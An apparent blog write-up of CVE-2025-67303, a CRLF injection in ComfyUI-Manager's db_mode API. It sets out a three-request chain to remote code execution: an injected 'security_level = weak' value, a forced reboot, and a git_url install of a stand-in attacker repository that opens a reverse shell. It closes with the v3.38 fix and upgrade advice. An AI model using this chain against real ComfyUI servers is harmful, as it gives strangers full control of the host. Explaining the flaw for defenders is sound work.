ComfyUI-Manager RCE: When "DB Mode" Becomes "God Mode"

If you've spent any time in the generative AI space, you know ComfyUI. It's the node-based, spaghetti-wire interface that turns Stable Diffusion from a command-line nightmare into a visual playground. Sitting on top of that is ComfyUI-Manager, the de facto app store for the ecosystem. It manages custom nodes, models, and updates. It is the administrative heart of the operation.

Here is the problem: ComfyUI was designed as a local tool for hobbyists. It wasn't built with the hardened security posture of a bank vault. But because GPU cloud rentals are expensive and local hardware is limited, users frequently expose their ComfyUI instances to the internet (often using --listen 0.0.0.0) to access them remotely. This practice turns a local creativity tool into a public-facing web server.

CVE-2025-67303 is the result of this collision between local convenience and remote exposure. It targets the very mechanism used to manage the application's state, turning a mundane configuration setting into a skeleton key that unlocks the entire server.

At its core, this vulnerability is a textbook CRLF (Carriage Return Line Feed) Injection, combined with insecure file permissions. The ComfyUI-Manager stores its runtime configuration in a file named config.ini, located in user/default/ComfyUI-Manager/. In versions prior to v3.38, this directory was not just accessible—it was mutable via the web API.

The specific culprit is the /api/manager/db_mode endpoint. This API is intended to switch the database mode (e.g., to 'cache' or 'local'). The handler for this endpoint takes a value parameter from the URL query string and—you guessed it—writes it directly to the configuration file.

The developers likely assumed the value would only ever be one of the expected strings. They didn't sanitize for newline characters (\r or \n). In the INI file format, a new line means a new configuration directive. If an attacker sends a value that includes a line break, they can effectively write their own settings into the file, overwriting or appending to the server's configuration.

Let's look at the logic failure. The vulnerable code takes the user input and concatenates it into a string buffer destined for config.ini. It looks something like this:

# Pseudocode of the vulnerability
key = request.args.get('value')
with open(config_path, 'w') as f:
    f.write(f"[default]\ndb_mode={key}\n")

If a user sends ?value=cache, the file looks like:

[default]
db_mode=cache

However, if an attacker sends ?value=cache%0Dsecurity_level%20=%20weak, the Python script blindly writes the decoded characters into the file. The resulting config.ini becomes:

[default]
db_mode=cache
security_level = weak

Notice the second line? The attacker has just injected a new configuration directive. The security_level setting in ComfyUI-Manager controls what actions are permitted. By default, it might be 'normal' or 'strong', preventing arbitrary code execution. By forcing it to 'weak', the attacker effectively turns off the safety mechanisms that prevent the installation of unauthorized scripts.

The exploit chain is elegant in its simplicity. It requires three distinct HTTP requests to go from "internet stranger" to "system administrator."

Step 1: The Injection The attacker sends a GET request to inject the malicious configuration. They set the security_level to weak. GET /api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak

Step 2: The Reboot Configuration files are usually only read at startup. To make the changes take effect, the attacker forces the service to reload. Conveniently, there is an API for that too. POST /api/manager/reboot

Step 3: The Execution Now that the server is running in "weak" mode, the guardrails are down. The ComfyUI-Manager allows installing custom nodes from arbitrary Git URLs in this mode. The attacker hosts a malicious Git repository containing a python script (usually in __init__.py or a specialized install script) that executes a reverse shell back to their listener. POST /customnode/install/git_url (payload: {"url": "https://github.com/attacker/malicious-node"})

Once the manager attempts to "install" this node, it runs the Python code within it, granting the attacker full control over the host machine.

The remediation for CVE-2025-67303 involved both code hygiene and architectural changes. The primary fix was released in ComfyUI-Manager v3.38.

First, the developers implemented input validation to ensure that configuration values cannot contain newline characters, neutralizing the CRLF injection vector. But simply patching the injection wasn't enough; the architectural flaw of having the config file in a web-accessible directory needed to be addressed.

The patch migrates the configuration and database files out of the user/default/ directory and into a protected system path, specifically user/__manager/. This directory is protected by ComfyUI's new System User Protection API, which prevents external web requests from reading or writing files in that location.

> [!NOTE] > If you are running an older version of the core ComfyUI (pre-v0.3.76), the protection API might not be available, leaving you partially exposed even with the updated Manager. You must update both the core application and the extension.